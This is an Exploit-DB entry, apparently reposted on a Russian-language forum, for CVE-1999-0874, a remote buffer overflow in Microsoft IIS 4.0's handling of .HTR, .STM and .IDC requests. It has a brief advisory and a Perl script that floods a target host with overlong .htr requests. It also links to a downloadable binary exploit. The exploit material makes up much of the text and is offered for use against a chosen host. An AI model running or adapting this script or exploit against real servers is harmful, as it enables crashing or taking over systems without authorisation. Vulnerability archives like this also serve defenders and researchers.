- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19245
- Проверка EDB
-
- Пройдено
- Автор
- EEYE DIGITAL SECURITY TEAM
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-1999-0874
- Дата публикации
- 1999-06-15
Microsoft IIS 4.0 - Remote Buffer Overflow (1)
Код:
source: https://www.securityfocus.com/bid/307/info
Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine.
IIS supports a number of file extensions that require futher processing. When a request is made for one of these types of files a specific DLL processes it. A stack buffer overflow vulnerability exists in several of these DLL's while handling .HTR, .STM or .IDC extensions.
Use the following script to test your site:
#!/usr/bin/perl
use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
warn "$i\n";
get "http://$ARGV[0]/".('a' x $i).".htr";
}
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19245.exe- Источник
- www.exploit-db.com
